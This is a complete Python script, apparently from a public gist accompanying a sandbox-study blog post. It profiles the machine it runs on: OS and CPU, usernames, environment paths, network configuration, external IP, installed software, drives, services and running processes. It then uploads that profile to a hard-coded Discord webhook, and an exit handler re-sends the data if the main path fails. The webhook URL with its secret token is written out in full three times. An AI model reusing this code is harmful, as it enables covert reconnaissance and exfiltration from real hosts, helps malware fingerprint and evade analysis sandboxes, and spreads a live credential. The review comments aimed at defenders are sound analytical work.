Python code used to take the environment data from sandboxes and send it to a Discord server.
################################################################################# | |
# # | |
# Refer to this blog post about what this code is used for: # | |
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html # | |
# # | |
################################################################################# | |
import requests | |
import os | |
import psutil | |
import platform | |
import subprocess | |
import socket | |
from discord_webhook import DiscordWebhook | |
import getpass | |
import json | |
from uuid import getnode as get_mac | |
from collections import namedtuple | |
from ctypes import byref, create_unicode_buffer, windll | |
from ctypes.wintypes import DWORD | |
from itertools import count | |
from datetime import datetime | |
import atexit | |
import cpuinfo # pip install py-cpuinfo | |
import time | |
startTime = datetime.now()  # wall-clock start; results['script_runtime'] is measured from here
##########################################################################################################
# MSI status codes and buffer sizes used by the ctypes helpers below; see
# http://msdn.microsoft.com/en-us/library/aa370101(v=VS.85).aspx
UID_BUFFER_SIZE = 39          # a product code is a 38-char GUID string plus its terminating NUL
PROPERTY_BUFFER_SIZE = 256    # initial size for MsiGetProductInfoW output; grown on ERROR_MORE_DATA
ERROR_SUCCESS = 0
ERROR_INVALID_PARAMETER = 87
ERROR_MORE_DATA = 234
ERROR_NO_MORE_ITEMS = 259
ERROR_UNKNOWN_PRODUCT = 1605
# Property names requested from MsiGetProductInfoW for each product.
# Not every product defines every property; missing ones read back as None.
PRODUCT_PROPERTIES = [
    'Language',
    'ProductName',
    'PackageCode',
    'Transforms',
    'AssignmentType',
    'PackageName',
    'InstalledProductName',
    'VersionString',
    'RegCompany',
    'RegOwner',
    'ProductID',
    'ProductIcon',
    'InstallLocation',
    'InstallSource',
    'InstallDate',
    'Publisher',
    'LocalPackage',
    'HelpLink',
    'HelpTelephone',
    'URLInfoAbout',
    'URLUpdateInfo',
]
REPORT_FILENAME = 'report_VMP.json'  # attachment name used when the report is uploaded
# Record type with one field per entry of PRODUCT_PROPERTIES, in the same order.
Product = namedtuple('Product', PRODUCT_PROPERTIES)
def get_property_for_product(product, property, buf_size=PROPERTY_BUFFER_SIZE):
    """Return one MSI product property as a str, or None if MSI reports an error.

    Thin wrapper around MsiGetProductInfoW.  When the output buffer is too
    small (ERROR_MORE_DATA) the query is retried with a doubled buffer; any
    status other than ERROR_SUCCESS / ERROR_MORE_DATA yields None.

    Args:
        product: product code (GUID string) to query.
        property: property name, normally one of PRODUCT_PROPERTIES.
        buf_size: initial output buffer length in characters.
    """
    current_size = buf_size
    while True:
        out_buf = create_unicode_buffer(current_size)
        out_len = DWORD(current_size)
        status = windll.msi.MsiGetProductInfoW(product, property, out_buf, byref(out_len))
        if status == ERROR_SUCCESS:
            return out_buf.value
        if status != ERROR_MORE_DATA:
            return None
        # Buffer too small for this value: grow geometrically and query again.
        current_size *= 2
def populate_product(uid):
    """Build a Product record for the MSI product code *uid*.

    Every name in PRODUCT_PROPERTIES is queried in order via
    get_property_for_product; properties MSI cannot return come back as None.
    """
    values = [get_property_for_product(uid, name) for name in PRODUCT_PROPERTIES]
    return Product(*values)
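def get_installed_products_uids():
    """Return the product codes (GUID strings) of all products MSI enumerates.

    Calls MsiEnumProductsW with increasing indices until ERROR_NO_MORE_ITEMS.
    Only ERROR_SUCCESS results are collected: on any other status the buffer
    does not hold a valid product code (the previous version appended it
    regardless, e.g. as an empty string), so that index is skipped and
    enumeration continues with the next one.
    """
    uids = []
    for index in count(0):
        guid_buf = create_unicode_buffer(UID_BUFFER_SIZE)
        status = windll.msi.MsiEnumProductsW(index, guid_buf)
        if status == ERROR_NO_MORE_ITEMS:
            # End of the product list.
            break
        if status == ERROR_SUCCESS:
            uids.append(guid_buf.value)
        # Any other status (e.g. a damaged registration at this index) is
        # skipped rather than recorded as a product code.
    return uids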
def get_installed_products():
    """Return a Product record for every product code MSI enumerates."""
    return [populate_product(uid) for uid in get_installed_products_uids()]
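def is_product_installed_uid(uid):
    """Return True if MSI knows the product code *uid*, False otherwise.

    Probes the VersionString property with MsiGetProductInfoW.
    ERROR_UNKNOWN_PRODUCT means the product is neither installed nor
    advertised.  ERROR_INVALID_PARAMETER means *uid* is not a well-formed
    product code; the previous version reported that as "installed", which
    this version no longer does.  Every other status (including
    ERROR_MORE_DATA, i.e. the product exists but its version string is longer
    than the probe buffer) still counts as installed, as before.

    Args:
        uid: product code GUID string, e.g. '{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}'.
    """
    uid_buffer = create_unicode_buffer(uid)
    property_buffer = create_unicode_buffer(PROPERTY_BUFFER_SIZE)
    size = DWORD(PROPERTY_BUFFER_SIZE)
    status = windll.msi.MsiGetProductInfoW(uid_buffer, u'VersionString', property_buffer, byref(size))
    return status not in (ERROR_UNKNOWN_PRODUCT, ERROR_INVALID_PARAMETER)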
def report_not_sent():
    """atexit fallback: send a reduced environment report if the main block never did.

    Reads the module globals report_sent (set True only after the main block's
    upload call returned), username (assigned in the main block) and startTime.
    Both the normal path and the except path perform network requests, so this
    handler is itself a source of outbound traffic at interpreter exit.
    """
    if not report_sent:
        try:
            # NOTE(review): same hard-coded webhook URL, including its secret
            # token, as at module level; anyone holding this file can post to
            # that channel.  It belongs in configuration, not in source.
            webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
            # External-IP lookup (first of two identical requests in this dict).
            outip = requests.get('https://api.ipify.org').text
            results = {
                "platform_system":platform.platform(),
                "platform_name":platform.node(),
                "platform_arch":platform.architecture(),
                "cpu_name":platform.processor(),
                "cpu_info":cpuinfo.get_cpu_info(),
                "num_cores":int(psutil.cpu_count()),
                "actor_pid":os.getpid(),
                # os.getlogin() can raise OSError without a controlling terminal /
                # logged-on session, which would send this run to the except branch.
                "actor_login_username":os.getlogin(),
                # `username` is a module global assigned in the main block; if the
                # run died before that assignment this raises NameError and the
                # except branch below sends the failure message instead.
                "actor_username":username,
                "platform_path_env":os.get_exec_path(),
                "actor_working_dir":os.getcwd(),
                # Second ipify request.  This key is repeated as "machine_ip":outip
                # below; in a dict literal the later entry wins, so this request's
                # result is discarded.
                "machine_ip":requests.get('https://api.ipify.org').text,
                "machine_boot_time":psutil.boot_time(),
                "machine_local_time_epoch":str(time.time()),
                "machine_local_time":str(datetime.now()),
                "machine_ip":outip,
                "machine_cpu_util_ratios":psutil.cpu_times_percent(),
                "machine_cpu_stats":psutil.cpu_stats(),
                "machine_cpu_percent":psutil.cpu_percent(),
                "machine_net_addrs":psutil.net_if_addrs(),
                "machine_disk_partitions":psutil.disk_partitions(),
                "machine_disk_stats":psutil.disk_io_counters(),
                # Third outbound host contacted by this handler.
                "internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(),
                # Duplicate of "cpu_info" above (a second cpuinfo probe).
                "cpuinfo":cpuinfo.get_cpu_info()
            }
            results['script_runtime'] = str(datetime.now() - startTime)
            # The report is staged on disk, re-read as text and attached under
            # REPORT_FILENAME.  Unlike the main block, this path never removes
            # nice_sandbox.bro afterwards.
            with open('nice_sandbox.bro','w') as fin:
                json.dump(results,fin)
            with open("nice_sandbox.bro", "r") as f:
                webhook.add_file(file=f.read(), filename=REPORT_FILENAME)
            # print(results)
            webhook.execute()
        except:
            # Bare except: every failure above (NameError, network errors,
            # KeyboardInterrupt, ...) lands here.  The recovery itself makes two
            # more network calls; if either fails, that new exception escapes
            # the atexit handler.
            webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
            webhook.content = "Failed execution for ip: %s (%s)" % (str(requests.get('https://api.ipify.org').text),str(platform.platform()))
            webhook.execute()
########################################################################################################## | |
# Module-level webhook client and "report delivered" flag.  report_not_sent()
# (registered with atexit below) reads report_sent and re-sends a report when
# this block never reached the `report_sent = True` line.
# NOTE(review): the webhook URL embeds the channel's secret token in source;
# anyone holding this file can post to that Discord channel.  Such a value
# belongs in the environment or a config file, not in a public gist.
# For defenders, the observable artifacts of a run are: outbound requests to
# api.ipify.org, just-the-time.appspot.com and discordapp.com, a file named
# nice_sandbox.bro in the working directory, and an `ipconfig`/`ifconfig`
# child process.
webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
report_sent = False
if __name__ == '__main__':
    # Fallback path: runs at interpreter exit, including after an uncaught
    # exception anywhere below.
    atexit.register(report_not_sent)
    if platform.system() == "Windows":
        # Raw `ipconfig` output, logical drive letters (pywin32's win32api) and
        # the MSI product list built by the ctypes helpers above.
        ip = subprocess.check_output(["ipconfig"],encoding='utf8').strip()
        import win32api
        drives = win32api.GetLogicalDriveStrings()
        # The drive list is NUL-separated with a trailing NUL, hence the [:-1].
        drives = drives.split('\000')[:-1]
        apps=get_installed_products()
    else:
        # Non-Windows: only the interface dump is collected; drives/apps are
        # placeholder strings.
        ip = subprocess.check_output(["ifconfig"],encoding='utf8').strip()
        drives = ["IDK-about-linux"]
        apps = ['IDK-about-linux']
    # Module globals that report_not_sent() also reads.
    username = getpass.getuser()
    # External-IP lookup: first outbound request of the run.
    outip = requests.get('https://api.ipify.org').text
    results = {
        "platform_system":platform.platform(),
        "platform_name":platform.node(),
        "platform_arch":platform.architecture(),
        "cpu_name":platform.processor(),
        "cpu_info":cpuinfo.get_cpu_info(),
        "num_cores":int(psutil.cpu_count()),
        "actor_pid":os.getpid(),
        # os.getlogin() can raise OSError without a controlling terminal /
        # logged-on session; that would divert the run to the atexit fallback.
        "actor_login_username":os.getlogin(),
        "actor_username":username,
        "actor_working_dir":os.getcwd(),
        "platform_path_env":os.get_exec_path(),
        "installed_sw":apps,
        "platform_ipconfig":str(ip),
        "machine_ip":outip,
        # psutil.cpu_stats() is called four times here and once more below, so
        # these fields are separate snapshots rather than one consistent reading.
        "cpu_stats":list([psutil.cpu_stats().ctx_switches,psutil.cpu_stats().interrupts, psutil.cpu_stats().soft_interrupts, psutil.cpu_stats().syscalls]),
        "machine_cpu_util_ratios":psutil.cpu_times_percent(),
        "machine_cpu_stats":psutil.cpu_stats(),
        "machine_cpu_percent":psutil.cpu_percent(),
        "machine_net_addrs":psutil.net_if_addrs(),
        "machine_disk_partitions":psutil.disk_partitions(),
        "machine_disk_stats":psutil.disk_io_counters(),
        # Usage of the first partition only; raises IndexError if the list is empty.
        "machine_disk0_usage":psutil.disk_usage(psutil.disk_partitions()[0].mountpoint),
        "machine_memory":psutil.virtual_memory(),
        "machine_battery":psutil.sensors_battery(),
        "machine_swap_memory":psutil.swap_memory(),
        # psutil defines win_service_iter only on Windows, yet this line runs on
        # both branches above; on the else-branch it raises AttributeError before
        # any report is written, leaving delivery to the atexit fallback.
        "running_services":[s.as_dict() for s in psutil.win_service_iter()],
        "running_processes":[s.as_dict() for s in psutil.process_iter()],
        "machine_boot_time":psutil.boot_time(),
        "machine_local_time_epoch":str(time.time()),
        "machine_local_time":str(datetime.now()),
        # Second outbound host contacted by this block.
        "internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(),
        "machine_drives":drives,
        # Duplicate of "cpu_info" above (a second cpuinfo probe).
        "cpuinfo":cpuinfo.get_cpu_info()
    }
    results['script_runtime'] = str(datetime.now() - startTime)
    # The report is staged on disk, re-read as text and attached under
    # REPORT_FILENAME.  The namedtuples psutil returns serialize as JSON arrays.
    with open('nice_sandbox.bro','w') as fin:
        json.dump(results,fin)
    with open("nice_sandbox.bro", "r") as f:
        webhook.add_file(file=f.read(), filename=REPORT_FILENAME)
    # print(results)
    webhook.execute()
    # Set only after the upload call returned.  The staged file is removed on
    # this success path alone; an exception anywhere above leaves
    # nice_sandbox.bro behind in the working directory.
    report_sent = True
    os.remove('nice_sandbox.bro')